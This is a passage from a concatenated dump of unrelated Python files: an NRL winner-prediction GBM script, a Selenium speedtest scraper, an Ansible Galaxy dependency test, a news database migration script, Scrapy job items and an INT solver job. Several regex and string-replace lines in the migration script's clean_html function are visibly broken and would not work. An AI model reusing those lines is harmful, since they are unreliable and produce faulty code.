len(to_categorical_list)+1)\n\n random_categorical_list = random.sample(to_categorical_list, k)\n\n for col in random_categorical_list:\n train['{}'.format(col)] = train['{}'.format(col)].asfactor()\n test['{}'.format(col)] = test['{}'.format(col)].asfactor()\n\n train['winner'] = train['winner'].asfactor()\n test['winner'] = test['winner'].asfactor()\n\n return train, test, random_categorical_list\n\n\ndef formulate_grid(train_set, test_set, max_run_time_secs, seed):\n\n # sample parameters for GBM\n gbm_params1 = {\"max_depth\": [i for i in range(2, 51)],\n \"ntrees\": [i for i in range(2, 51)],\n \"min_rows\": [i for i in range(8, 144, 8)],\n \"nbins\": [16, 32, 64, 128, 256, 512, 1024],\n \"sample_rate\": [i for i in np.arange(0.2, 1, 0.01)],\n \"learn_rate\": [i for i in np.arange(0.01, 0.2, 0.01)],\n \"learn_rate_annealing\": [i for i in np.arange(0.9, 1, 0.01)],\n \"col_sample_rate\": [i for i in np.arange(0.2, 1, 0.01)],\n \"nbins_cats\": [16, 32, 64, 128, 256, 512, 1024, 2048, 4096],\n \"col_sample_rate_per_tree\": [i for i in np.arange(0.2, 1, 0.01)],\n \"min_split_improvement\": [0e+00, 1e-08, 1e-06, 1e-04],\n \"distribution\": ['multinomial'],\n \"histogram_type\": [\"UniformAdaptive\",\n \"QuantilesGlobal\",\n \"RoundRobin\"],\n \"col_sample_rate_change_per_level\": [i for i in np.arange(0.2, 1.5, 0.01)]}\n\n # Search criteria\n search_criteria = {'strategy': 'RandomDiscrete',\n 'seed': seed,\n 'max_runtime_secs': max_run_time_secs,\n 'stopping_tolerance': 0.00001}\n\n # Train and validate a grid of GBMs\n gbm_grid = H2OGridSearch(model=H2OGradientBoostingEstimator,\n grid_id='gbm_grid1',\n hyper_params=gbm_params1,\n search_criteria=search_criteria)\n preds = ['home_team',\n 'home_odds',\n 'away_odds',\n 'day_of_week',\n 'night_game',\n 'hour',\n 'first_round',\n 'second_round',\n 'home_wins_in_a_row',\n 'home_losses_in_a_row',\n 'home_position',\n 'home_ranking_quantile',\n 'home_points',\n 'home_for_per_game',\n 'home_against_per_game',\n 'home_rest',\n 'home_previous_result',\n 'home_time_from_last_win',\n 'home_time_from_last_extra_time_game',\n 'home_time_from_last_loss',\n 'home_time_from_last_draw',\n 'away_team',\n 'away_position',\n 'away_points',\n 'away_wins_in_a_row',\n 'away_losses_in_a_row',\n 'away_ranking_quantile',\n 'away_for_per_game',\n 'away_against_per_game',\n 'away_rest',\n 'away_previous_result',\n 'away_time_from_last_win',\n 'away_time_from_last_extra_time_game',\n 'away_time_from_last_loss',\n 'away_time_from_last_draw',\n 'rest_spread']\n\n try:\n gbm_grid.train(x=preds, y='winner',\n training_frame=train_set,\n validation_frame=test_set,\n seed=seed\n )\n except:\n h2o.cluster().shutdown()\n sys.exit()\n\n gbm_grid_perf = gbm_grid.get_grid(sort_by='r2', decreasing=True)\n\n return gbm_grid_perf, preds\n\n\nif __name__ == \"__main__\":\n\n args_parser = argparse.ArgumentParser(description='Predict NRL Scores GBM')\n args_parser.add_argument('--max_run_time_secs', type=int, required=False)\n args_parser.add_argument('--seed', type=int, required=False)\n args_parser.add_argument('--location', type=str, required=False)\n args_parser.add_argument('--config', type=str, required=False)\n\n args = args_parser.parse_args()\n\n if args.max_run_time_secs:\n max_run_time_secs = args.max_run_time_secs\n else:\n max_run_time_secs = 200\n\n if args.seed:\n seed = args.seed\n else:\n seed = 1234\n\n if args.location:\n location = args.location\n else:\n location = 'nrl-prediction-analysis.com/previous-nrl-results.parquet.gzip'\n\n if args.config:\n config_name = 
args.config\n else:\n config_name = 'nrl_config.ini'\n\n # start the local H2O cluster (it is shut down again at the end of the run)\n h2o.init()\n\n # load in config file\n config = configparser.ConfigParser()\n config.read(config_name)\n\n # get secret keys from config file\n access_key = config['aws']['aws_access_key_id']\n secret_key = config['aws']['aws_secret_access_key']\n\n file_swap_s3(access_key, secret_key, \"s3://nrl-prediction-analysis.com/mlruns/\", os.getcwd() + '/mlruns/')\n\n mlflow.set_experiment(\"predict-winner-nrl\")\n\n df = get_data(access_key, secret_key, location)\n\n train, test = split_df(df, random=False)\n\n train, test, random_categorical_list = convert_vars(train, test)\n\n # list of models, ordered from best to worst performing\n grid, predictors = formulate_grid(train, test, max_run_time_secs, int(seed))\n\n # now we log the results in mlflow\n ranking = 1\n for model in grid:\n\n mlflow.start_run()\n\n print(\"\\nMetrics for no {} model\".format(ranking))\n\n ranking += 1\n\n r2_metrics, mse_metrics, rmse_metrics, auc_metrics = get_metrics(model, train, test)\n\n log_metrics(r2_metrics, mse_metrics, rmse_metrics)\n\n script_name = sys.argv[0]\n\n log_artifacts(model, script_name)\n\n for keys in model.params:\n mlflow.log_param(keys, model.params[keys]['actual'])\n\n mlflow.log_param(\"independent_variables\", predictors)\n\n mlflow.log_param(\"categorical_variables\", random_categorical_list)\n\n # change where the artifacts save\n path = mlflow.get_artifact_uri().replace(\"file://\", \"\")\n path_split = path.split('/')\n path_split[4] = \"mlruns_artifacts\"\n new_path = '/'.join(path_split)\n\n move_files(path, new_path)\n\n mlflow.end_run()\n\n # Remove files that are already saved elsewhere\n for filename in glob.glob(\"gbm_grid1_model*\"):\n os.remove(os.getcwd() + '/' + filename)\n\n if ranking == 3:\n break\n\n mlflow.end_run()\n\n if os.path.isfile(os.getcwd() + \"/h2o-genmodel.jar\"):\n os.remove(os.getcwd() + \"/h2o-genmodel.jar\")\n\n if os.path.isfile(os.getcwd() + \"/var_imp.png\"):\n os.remove(os.getcwd() + \"/var_imp.png\")\n\n if os.path.isfile(os.getcwd() + \"/var_imp.csv\"):\n os.remove(os.getcwd() + \"/var_imp.csv\")\n\n # back up parameters, metrics and artifacts to s3\n file_swap_s3(access_key, secret_key, os.getcwd() + '/mlruns/',\n \"s3://nrl-prediction-analysis.com/mlruns/\")\n file_swap_s3(access_key, secret_key, os.getcwd() + '/mlruns_artifacts/',\n \"s3://nrl-prediction-analysis.com/mlruns_artifacts/\")\n\n h2o.cluster().shutdown()\n\n print(\"Finished\")\n","repo_name":"nathan-bennett/nrl_statistical_analysis","sub_path":"predict_nrl_winners.py","file_name":"predict_nrl_winners.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26486796300","text":"from selenium.webdriver.common.by import By\nimport time\n\n\nclass Ookla:\n    def __init__(self, driver):\n        self.driver = driver\n\n    def test_speed(self):\n        self.driver.get(\"https://www.speedtest.net/\")\n        time.sleep(1)\n\n        self.driver.find_element(By.ID, '_evidon-banner-acceptbutton').click()\n        time.sleep(1)\n\n        self.driver.execute_script(\"window.scrollTo(0, 400)\")\n        time.sleep(1)\n\n        self.driver.find_element(By.CSS_SELECTOR, \".start-button a\").click()\n\n        time.sleep(40)\n\n        down_speed = float(self.driver.find_element(By.XPATH, '//*[@id=\"container\"]/div/div[3]/div/div/div/div[2]/div[3]/div[3]/div/div[3]/div/div/div[2]/div[1]/div[2]/div/div[2]/span').text)\n        print(down_speed)\n        # down_speed = 420\n        return 
down_speed\n","repo_name":"tudorobretin/Automated-Complaints-Twitter-Bot","sub_path":"ookla.py","file_name":"ookla.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45030620824","text":"\"\"\"test_dependencies.py - Tests of collection dependency handling.\"\"\"\nimport logging\n\nimport attr\nimport pytest\n\nfrom ..conftest import is_hub_4_5\nfrom ..utils import ansible_galaxy, build_collection, get_client, set_certification\n\npytestmark = pytest.mark.qa # noqa: F821\n\nlogger = logging.getLogger(__name__)\n\n\n@attr.s\nclass DependencySpec:\n name = attr.ib()\n spec = attr.ib()\n retcode = attr.ib()\n xfail = attr.ib(default=False)\n\n\n@pytest.mark.all\n@pytest.mark.cli\n@pytest.mark.slow_in_cloud\n@pytest.mark.parametrize(\n \"params\",\n (\n DependencySpec(\"normal\", \"1.0.0\", 0),\n DependencySpec(\"exact\", \"=1.0.0\", 0),\n DependencySpec(\"lt\", \"<2.0.0\", 0),\n DependencySpec(\"lteq\", \"<=2.0.0\", 0),\n DependencySpec(\"gt\", \">0.9.0\", 0),\n DependencySpec(\"gteq\", \">=0.9.0\", 0),\n DependencySpec(\"range\", \">0.1.0,<1.0.1\", 0),\n DependencySpec(\"invalid\", \"this is just junk\", 1),\n # DependencySpec(\"carot\", \"^1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"tilde\", \"~1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"exception\", \">0.0.0,!=1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"missing1\", \"2.0.0\", 1, xfail=\"galaxy-dev#104\"),\n # DependencySpec(\"missing2\", \">1.0.0\", 1, xfail=\"galaxy-dev#104\"),\n ),\n ids=lambda s: s.name,\n)\ndef test_collection_dependency_install(ansible_config, published, cleanup_collections,\n params, galaxy_client):\n \"\"\"Collections defining dependencies can be installed and their dependencies are installed\n as well.\n\n Currently some scenarios are XFAIL pending open tickets:\n - Dependency specs with no matching collections (galaxy-dev#104)\n - NPM-style specs (not part of semver) are invalid\n \"\"\"\n\n spec = params.spec\n retcode = params.retcode\n artifact2 = build_collection(dependencies={f\"{published.namespace}.{published.name}\": spec})\n\n try:\n ansible_galaxy(\n f\"collection publish {artifact2.filename} --server=automation_hub\",\n check_retcode=retcode,\n ansible_config=ansible_config(\"basic_user\")\n )\n except AssertionError:\n if params.xfail:\n return pytest.xfail()\n else:\n raise\n\n if retcode == 0:\n config = ansible_config(\"partner_engineer\")\n client = get_client(config)\n hub_4_5 = is_hub_4_5(ansible_config)\n gc = galaxy_client(\"partner_engineer\")\n set_certification(client, gc, artifact2, hub_4_5=hub_4_5)\n\n pid = ansible_galaxy(\n f\"collection install -vvv --ignore-cert \\\n {artifact2.namespace}.{artifact2.name}:{artifact2.version} --server\"\n f\"=automation_hub\",\n check_retcode=False,\n ansible_config=ansible_config(\"basic_user\"),\n # cleanup=False\n )\n\n try:\n assert (\n pid.returncode == retcode\n ), f\"Unexpected {'failure' if pid.returncode else 'success'} during installing \\\n {artifact2.namespace}.{artifact2.name}:{artifact2.version} \\\n with dependency {published.namespace}.{published.name}{spec}\"\n except AssertionError:\n raise\n","repo_name":"ansible/galaxy_ng","sub_path":"galaxy_ng/tests/integration/cli/test_dependencies.py","file_name":"test_dependencies.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"72"} 
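The dependency test in the record above exercises semver-style version specifiers such as "=1.0.0", ">=0.9.0" and ">0.1.0,<1.0.1", and expects NPM-style forms ("^1.0.0", "~1.0.0") and junk strings to be rejected. The stdlib-only sketch below shows one way such specifiers could be pre-validated; the clause grammar is an assumption inferred from the DependencySpec cases, not galaxy_ng's or ansible-galaxy's actual parser.

import re

# One comma-separated clause: an optional comparison operator followed by a
# strict MAJOR.MINOR.PATCH semver core ("^" and "~" are deliberately absent,
# matching the NPM-style cases the test above expects to fail).
_CLAUSE = re.compile(r"^(==?|<=?|>=?)?\d+\.\d+\.\d+$")


def is_valid_spec(spec: str) -> bool:
    """Return True if every clause of a dependency spec looks well-formed."""
    clauses = [clause.strip() for clause in spec.split(",")]
    return all(_CLAUSE.match(clause) for clause in clauses)


assert is_valid_spec("1.0.0") and is_valid_spec(">0.1.0,<1.0.1")
assert not is_valid_spec("this is just junk")
assert not is_valid_spec("^1.0.0") and not is_valid_spec("~1.0.0")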
+{"seq_id":"70133725674","text":"# -*- coding: utf-8 -*-\nimport re\nimport json\n#import logging\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import IntegrityError\nfrom jinja2 import Markup\nfrom html5tidy import tidy\nfrom ftfy import fix_text\n\nfrom niku import db_session\nfrom niku.models.core import Site, Article\nfrom niku.helpers.url import create_slug\n\n\nengine = create_engine('mysql+oursql://enang:yusup@localhost/liputan6_xxx?charset=latin1')\nconn = engine.connect()\n\n\n#logging.basicConfig(filename='migration.log')\n#logger = logging.getLogger('sqlalchemy.engine')\n#logger.setLevel(logging.DEBUG)\n\n# buat koleksi\nurls_txt = open('urls.txt', 'w')\n\n\ndef get_ids():\n result = conn.execute(\"select id from tbl_news\")\n ids = [row[0] for row in result]\n return sorted(ids)\n\n\ndef get_cats():\n result = conn.execute(\"select c.cat_id, c.cat_name, ch.channel_name \\\n from tbl_category as c, tbl_channel as ch \\\n where c.channel_id=ch.channel_id\")\n # FIXME: row[1] == nama kategori, dipake buat salah satu tag\n # apakah bener di lower() atau tidak, tentukan dulu\n cats = dict((row[0], [row[2].lower(), row[1].lower()]) for row in result)\n return cats\n\n\ndef get_news(id):\n result = conn.execute(\"select * from tbl_news where id = ?\", id)\n row = result.fetchone()\n return row\n\n\ndef clean_html(text):\n # banyak link ngaco di dalam berita, bersihin dulu\n text = re.sub(r'\"]+)>', r'', text)\n text = re.sub(r'', r'', text)\n text = text.replace('http:http', 'http')\n text = text.replace('http:// http://', 'http://')\n # baru mulai mengurus isi\n text = fix_text(text.strip())\n try:\n text = tidy(text, fragment=True, encoding='utf-8')\n except UnicodeDecodeError:\n pass\n # kenapa banyak banget backtick? it should be single quote!\n text = text.replace(\"`\", \"'\")\n # sebenernya sih: http://html5doctor.com/i-b-em-strong-element/\n # tapi demi konsistensi sama ckeditor...\n # FIXME: it's better to fix this in ckeditor instead\n text = text.replace('', '').replace('', '')\n text = text.replace('', '').replace('', '')\n try:\n text = Markup(text.decode('utf-8', 'replace')).unescape()\n except UnicodeEncodeError:\n # isinya apa sebenernya, udah diginiin, masih aja error nyink!\n pass\n # satu link lagi, terlalu aneh buat diedit di depan, harus belakangan\n text = re.sub(r'[\\\\\"]+(http://[\\w/.-]+)[\\\\\"]+', r'\"\\1\"', text)\n return text\n\n\n_junk_re1 = re.compile(r'[^\\w&\\- ]')\n_junk_re2 = re.compile(r'^(soal|fokus|kasus)')\n\n\ndef clean_tag(tag):\n try:\n tag = Markup(fix_text(tag.decode('utf-8'))).striptags()\n except UnicodeEncodeError:\n return None\n tag = _junk_re1.sub('', tag).strip()\n tag = _junk_re2.sub('', tag).strip()\n\n if not tag:\n return None\n if len(tag) < 3:\n return None\n if len(tag) > 40:\n return None\n if tag.isdigit():\n return None\n return tag\n\n\ndef migrate():\n # old db\n cats = get_cats()\n ids = get_ids()\n\n # new db\n top = Site.query.filter_by(name='top').first()\n news = Site.query.filter_by(name='news').first()\n showbiz = Site.query.filter_by(name='showbiz').first()\n bola = Site.query.filter_by(name='bola').first()\n health = Site.query.filter_by(name='health').first()\n tekno = Site.query.filter_by(name='tekno').first()\n\n # cek id terakhir yang sudah masuk di db baru\n last_article = Article.query.order_by('id desc').first()\n last_id = last_article.id if last_article else None\n\n for id in ids:\n # kalau udah ada di db baru, skip\n if id <= last_id:\n continue\n\n # normal: ambil data di db lama\n 
_news = get_news(id)\n\n try:\n kanal = cats[_news.cat_id][0]\n kategori = cats[_news.cat_id][1]\n except KeyError:\n # cat_id ngegantung tanpa kanal. channel_id 11 ada di mana?\n site = top\n else:\n if kanal in ['berita', 'buser']:\n if kategori == 'olah raga':\n site = bola\n else:\n site = news\n elif kanal in ['showbiz', 'musik']:\n site = showbiz\n elif kanal in ['sport', 'bola']:\n site = bola\n elif kanal == 'kesehatan':\n site = health\n elif kanal == 'tekno':\n site = tekno\n else:\n # otomotif, gayahidup, pemilu, citizen6\n site = top\n\n try:\n migrate_article(site, _news, kategori)\n except IntegrityError:\n # kita bukan makhluk dengan integritas!\n pass\n\n urls_txt.close()\n\n\n_href_re = re.compile(r'href=\"([\\w:/,.?=-]+\")>')\n\n\ndef migrate_article(site, news, cat_name):\n # buang berita yang tadinya tidak dipublish\n if news.publish == '0':\n return\n\n # buang bekasan scmusik.com, tidak valid!\n if news.title in ['About Us', 'Site Map', 'FAQ',\n 'Term Of Service', 'Contact Us']:\n return\n\n # bersihkan title berita yang mau diproses\n title = clean_html(news.title)\n\n # unpublish berita dari kanal-kanal yang musnah\n if site.name == 'top':\n published = False\n\n # unpublish berita-berita cuma selintas - 60 detik\n elif '60 Detik' in title or \\\n title.startswith('Intisari Liputan') or \\\n title in ['Lintas Daerah', 'Lintas Ekbis',\n 'Lintas Olahraga', 'Ragam Hiburan',\n 'Kriminal Sepekan', 'Kriminalitas Sepekan']:\n published = False\n else:\n published = True\n\n # cuma bikin slug buat berita yang dipublish\n if published:\n slug = create_slug(title)\n else:\n slug = None\n\n # shortdesc & content, bersihin dulu sebisanya\n shortdesc = clean_html(news.shortdesc)\n content = clean_html(news.news)\n\n # fix masalah date yang naudzubillah randomnnya\n if news.modified:\n published_time = news.publish_date\n last_modified = news.modified\n elif news.publish_date:\n published_time = news.publish_date\n last_modified = news.publish_date\n else:\n published_time = news.dates\n last_modified = news.dates\n\n article = Article(id=news.id,\n site=site,\n title=title,\n slug=slug,\n shortdesc=shortdesc,\n content=content,\n published=published,\n published_time=published_time,\n last_modified=last_modified\n )\n db_session.add(article)\n\n #### tags\n # merge isi kategori, prehead, terkait, keyword ke dalam satu list\n _tags1 = [cat_name]\n for words in [news.prehead, news.terkait, news.keyword]:\n if not words:\n continue\n _tags1 += words.split(',')\n\n # demi konsistensi: lowercase them all\n # FIXME: is this the right decision?\n _tags2 = [tag.lower() for tag in _tags1]\n\n ## tag tambahan\n # cat_id di bawah ini diambil dari tbl_category, cat_parent == 4\n if news.cat_id in ['94', '95', '96', '97', '98', '99',\n '100', '101', '102', '103']:\n _tags2.append('ekonomi')\n\n # bener gak ini masuk peristiwa?\n if news.cat_id in [2, 3, 6, 7, 9]:\n _tags2.append('peristiwa')\n\n # kanal musik masuk ke showbiz, kategori musik\n if news.cat_id in ['37', '38', '39', '40', '41', '42',\n '43', '44', '45', '86', '109', '123']:\n _tags2.append('musik')\n\n # daerah & ibukota itu berita nasional kan ya?\n for word in ['daerah', 'ibu kota', 'ibukota']:\n if word in _tags2:\n _tags2.append('nasional')\n\n # rename tag yang mesti direname\n _tags3 = []\n for tag in _tags2:\n tag = clean_tag(tag)\n if not tag:\n continue\n if tag in ['berita', 'lain-lain']:\n continue\n if tag == 'ekonomi & bisnis':\n tag = 'ekonomi'\n elif tag == 'luar negeri':\n tag = 'internasional'\n elif tag == 
'ibu kota':\n tag = 'ibukota'\n elif tag.startswith('prediksi'):\n tag = 'prediksi'\n _tags3.append(tag)\n\n # buang duplikasi tag\n _tags4 = list(set(_tags3))\n\n # and insert 'em\n article.str_tags = _tags4\n\n db_session.commit()\n\n # terakhir, ngegrep url dari content, buat koleksi\n link = _href_re.findall(article.content)\n if link:\n js = json.dumps((news.id, link))\n urls_txt.write(js + '\\n')\n","repo_name":"enangyusup/sinau-python","sub_path":"kemek/niku_migrate/dbmigrate.py","file_name":"dbmigrate.py","file_ext":"py","file_size_in_byte":8689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14675948","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\nimport datetime\n\nimport scrapy\nimport time\nimport re\n\nfrom scrapy.loader.processors import MapCompose, Join\n\n\ndef reg_matcher(food, regular, *default_value):\n if isinstance(food, list):\n food = food[0]\n result = re.match(regular, food,re.S)\n if result:\n return result.group(1)\n\n return (lambda: \"\" if default_value is None else default_value)()\n\n\ndef handle_date(date):\n \"\"\"\n 处理日期\n :param date:\n :return:\n \"\"\"\n result = 0\n if \"天\" in date:\n match_result = re.match(\"(\\d+)\", date)\n days = lambda: int(match_result.group(1)) if match_result else 1\n result = datetime.date.today() - datetime.timedelta(days=days())\n # dateTime = time.strptime(dateTime.strftime(\"%Y-%m-%d %H:%M\"), \"%Y-%m-%d %H:%M\")\n result = int(time.mktime(result.timetuple()))\n elif \":\" in date:\n result = int(\n time.mktime(time.strptime((datetime.date.today().strftime(\"%Y-%m-%d \") + date), \"%Y-%m-%d %H:%M\")))\n elif \"-\" in date:\n result = int(time.mktime(time.strptime(date, \"%Y-%m-%d\")))\n else:\n result = int(time.time())\n return result\n\n\nclass BaseItem(scrapy.Item):\n \"\"\"\n 基础数据处理Item\n \"\"\"\n\n def render_insert_info(self):\n \"\"\"\n 用于返回SQL语句,以及参数值\n :return: SQL,params\n \"\"\"\n table_name = \"\"\"\"\"\"\n params = ()\n update_params = []\n return table_name, params, update_params\n\n\nclass FilterJoin(Join):\n def __init__(self, filter_regular, separator=u' '):\n super().__init__(separator)\n self.separator = separator\n self.filter = filter_regular\n\n def __call__(self, values):\n return self.separator.join(list(filter(lambda y: self.filter(y), values)))\n\n\nclass JobItem(BaseItem):\n \"\"\"\n 工作Item\n \"\"\"\n\n url = scrapy.Field()\n url_id = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?(\\d+).*\"))\n )\n title = scrapy.Field()\n salary_min = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?(\\d+).*\", 0) if \"-\" in x else 0)\n )\n salary_max = scrapy.Field(\n input_processor=MapCompose(\n lambda x: reg_matcher(x, \".*-(\\d+)?(k|K)\", 0) if \"-\" in x else 0)\n )\n exp_min = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?(\\d+).*\", 0) if \"-\" in x else 0)\n )\n exp_max = scrapy.Field(\n input_processor=MapCompose(\n lambda x: reg_matcher(x, \".*-(\\d+)?(年|$)\", 0) if \"-\" in x else 0)\n )\n degree = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?([\\u4E00-\\u9FA5]+).*\"))\n )\n type = scrapy.Field(\n input_processor=MapCompose(lambda x: reg_matcher(x, \".*?([\\u4E00-\\u9FA5]+).*\"))\n )\n date = scrapy.Field(\n input_processor=MapCompose(\n lambda x: handle_date(reg_matcher(x, 
\".*?((\\d+天前)|(\\d+:\\d+)|(\\d{4}[年/-]\\d+($|[月/-])\\d*($|[号日]|)))\"))\n )\n )\n tags = scrapy.Field(output_processor=Join(\",\"))\n advantages = scrapy.Field()\n desc = scrapy.Field(output_processor=Join(\";\"))\n location = scrapy.Field(output_processor=FilterJoin(lambda x: \"地图\" not in x, \",\"))\n company_url = scrapy.Field()\n company_name = scrapy.Field(input_processor=MapCompose(lambda x: reg_matcher(x, \".*?([\\S]+).*\", \"\")))\n crawl_time = scrapy.Field()\n\n def render_insert_info(self):\n table_name = \"job\"\n params = dict(\n url=self['url'],\n url_id=self['url_id'],\n title=self['title'],\n salary_min=self['salary_min'],\n salary_max=self['salary_max'],\n exp_min=self['exp_min'],\n exp_max=self['exp_max'],\n degree=self['degree'],\n type=self['type'],\n date=self['date'],\n tags=self['tags'],\n advantages=self['advantages'],\n desc=self['desc'],\n location=self['location'],\n company_url=self['company_url'],\n company_name=self['company_name'],\n crawl_time=self['crawl_time'],\n crawl_update_time=int(time.time()),\n )\n update_params = [\n 'salary_min',\n 'salary_max',\n 'exp_min',\n 'exp_max',\n 'degree',\n 'location',\n \"crawl_update_time\"\n ]\n return table_name, params, update_params\n","repo_name":"ms-liu/ScrapySpider","sub_path":"ScrapySpider/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11604726465","text":"import pickle\nimport time\nfrom copy import deepcopy\n\nfrom joblib import Parallel, delayed\n\nfrom jobs.core import Job\nfrom metric_logging import log_scalar, log_scalar_metrics, MetricsAccumulator, log_text\nfrom supervised.int.gen_subgoal_data import generate_problems\n\nfrom visualization.seq_parse import logic_statement_to_seq_string, entity_to_seq_string\n\n\ndef solve_problem(solver, input_state):\n time_s = time.time()\n solver.construct_networks()\n solution, tree_metrics, root, trajectory_actions, additional_info = solver.solve(input_state)\n time_solving = time.time() - time_s\n return dict(\n solution=solution,\n tree_metrics=tree_metrics,\n root=root,\n trajectory_actions=trajectory_actions,\n time_solving=time_solving,\n input_problem=deepcopy(input_state),\n additional_info=additional_info\n )\n\n\nclass JobSolveINT(Job):\n def __init__(self,\n solver_class,\n n_jobs,\n n_parallel_workers,\n batch_size,\n budget_checkpoints=None,\n real_budget_checkpoints=None,\n log_solutions_limit=100,\n job_range=None,\n collect_solutions=None\n ):\n\n self.solver_class = solver_class\n self.n_jobs = n_jobs\n self.n_parallel_workers = n_parallel_workers\n self.batch_size = batch_size\n self.budget_checkpoints = budget_checkpoints\n self.real_budget_checkpoints = real_budget_checkpoints\n self.log_solutions_limit = log_solutions_limit\n self.job_range = job_range\n self.collect_solution = collect_solutions\n\n self.solved_stats = MetricsAccumulator()\n self.experiment_stats = MetricsAccumulator()\n self.calls_stats = MetricsAccumulator()\n self.distance_stats = MetricsAccumulator()\n\n self.verifications = dict()\n\n self.logged_solutions = 0\n\n if self.collect_solution is not None:\n self.collection = {}\n\n def execute(self):\n proofs_to_solve = generate_problems(self.n_jobs)\n\n solver = self.solver_class()\n # solver.construct_networks()\n\n total_time_start = time.time()\n\n jobs_done = 0\n jobs_to_do = self.n_jobs\n batch_num = 0\n\n while jobs_to_do > 0:\n jobs_in_batch = min(jobs_to_do, self.batch_size)\n 
boards_to_solve_in_batch = proofs_to_solve[jobs_done:jobs_done + jobs_in_batch]\n\n results = Parallel(n_jobs=self.n_parallel_workers, verbose=100)(\n delayed(solve_problem)(solver, input_problem[0]) for input_problem in boards_to_solve_in_batch\n )\n\n self.log_results(results, jobs_done)\n\n jobs_done += jobs_in_batch\n jobs_to_do -= jobs_in_batch\n batch_num += 1\n\n for metric, value in self.solved_stats.return_scalars().items():\n log_text('summary', f'{metric}, {value}')\n log_text('summary', f'Finished time , {time.time() - total_time_start}')\n\n def log_results(self, results, step):\n n_logs = len(results)\n for log_num, result in enumerate(results):\n log_scalar_metrics('tree', step+log_num, result['tree_metrics'])\n if self.logged_solutions < self.log_solutions_limit:\n self.log_solution(result['solution'], result['trajectory_actions'], result['input_problem'], step+log_num)\n solved = result['solution'] is not None\n self.experiment_stats.log_metric_to_accumulate('tested', 1)\n log_scalar_metrics('problems', step+log_num, self.experiment_stats.return_scalars())\n log_scalar('time_solving', step + log_num, result['time_solving'])\n\n if solved:\n self.solved_stats.log_metric_to_average('rate/all', 1)\n self.solved_stats.log_metric_to_accumulate('problems', 1)\n log_scalar('solution', step + log_num, 1)\n log_scalar('solution/length', step + log_num, len(result['trajectory_actions']))\n # assert False\n trajectory_actions = [str(action) for action in result['trajectory_actions']]\n trajectory = ', '.join(trajectory_actions)\n log_text('trajectory_actions', f'{step + log_num}: {trajectory}', False)\n log_scalar('solution/n_subgoals', step + log_num, len(result['solution']))\n\n # subgoal distances\n path = list(reversed(result['additional_info']['subgoal_distances']))\n if len(path) >= 1:\n for id in [0, 1, -1, -2]:\n log_scalar(f'solution/distances/step nb. {id}', step + log_num, path[id])\n self.distance_stats.log_metric_to_average(f'avg step nb. 
{id}', path[id])\n else:\n self.solved_stats.log_metric_to_average('rate/all', 0)\n self.solved_stats.log_metric_to_accumulate('problems', 0)\n log_scalar('solution', step+log_num, 0)\n log_scalar('solution/length', step + log_num, -1)\n log_text('trajectory_actions', f'{step + log_num}: unsolved', False)\n log_scalar('solution/n_subgoals', step + log_num, -1)\n\n log_scalar('verificator failed', step + log_num, result['additional_info']['verificator_failed'])\n\n log_scalar_metrics('predictions', step+log_num, result['additional_info']['predictions'])\n # log_scalar('problems', step + n_logs, step + n_logs)\n\n # if result['tree_metrics']['nodes'] < 100:\n for i, verification in enumerate(result['additional_info']['verifications']):\n if i in self.verifications.keys():\n self.verifications[i] = self.verifications[i] + verification\n else:\n self.verifications[i] = verification\n # else:\n # print('Too long episode:', result['tree_metrics']['nodes'], 'nodes')\n\n joint_calls = 0\n for key in result['additional_info']:\n if 'calls/' in key:\n self.calls_stats.log_metric_to_accumulate(key + '_sum', result['additional_info'][key])\n log_scalar(key, step + log_num, result['additional_info'][key])\n joint_calls += result['additional_info'][key]\n self.calls_stats.log_metric_to_accumulate('calls/joint_sum', joint_calls)\n log_scalar('calls/joint', step + log_num, joint_calls)\n\n if self.budget_checkpoints is not None:\n for budget in self.budget_checkpoints:\n if result['tree_metrics']['expanded_nodes'] <= budget and solved:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_exp_nodes', 1)\n else:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_exp_nodes', 0)\n\n if result['tree_metrics']['nodes'] <= budget and solved:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_nodes', 1)\n else:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_nodes', 0)\n\n if self.real_budget_checkpoints is not None:\n for budget in self.real_budget_checkpoints:\n if result['tree_metrics']['real_cost_final'] <= budget and solved:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_evaluations', 1)\n else:\n self.solved_stats.log_metric_to_average(f'rate/{budget}_evaluations', 0)\n\n for i, verification in self.verifications.items():\n log_text(f'verifications of builder {i}', str(verification), False)\n log_text(f'(normalized) verifications of builder {i}',\n str([verification[0] / sum(verification[0]), verification[1] / sum(verification[1])]), False)\n\n log_scalar_metrics('solved', step+n_logs, self.solved_stats.return_scalars())\n log_scalar_metrics('calls', step+n_logs, self.calls_stats.return_scalars())\n log_scalar_metrics('solution/distances', step+n_logs, self.distance_stats.return_scalars())\n\n def log_solution(self, solution, trajectory_actions, input_problem, step):\n if solution is not None:\n solution_str = f'Problem {step} : {solution[0].hash} \\n'\n\n for subgoal_num, node in enumerate(solution[1:]):\n solution_str += f'subgoal {subgoal_num} : {node.hash} \\n'\n solution_str += '\\n \\n'\n solution_str += 'Actions: \\n'\n\n for action_num, action in enumerate(trajectory_actions):\n solution_str += f'action 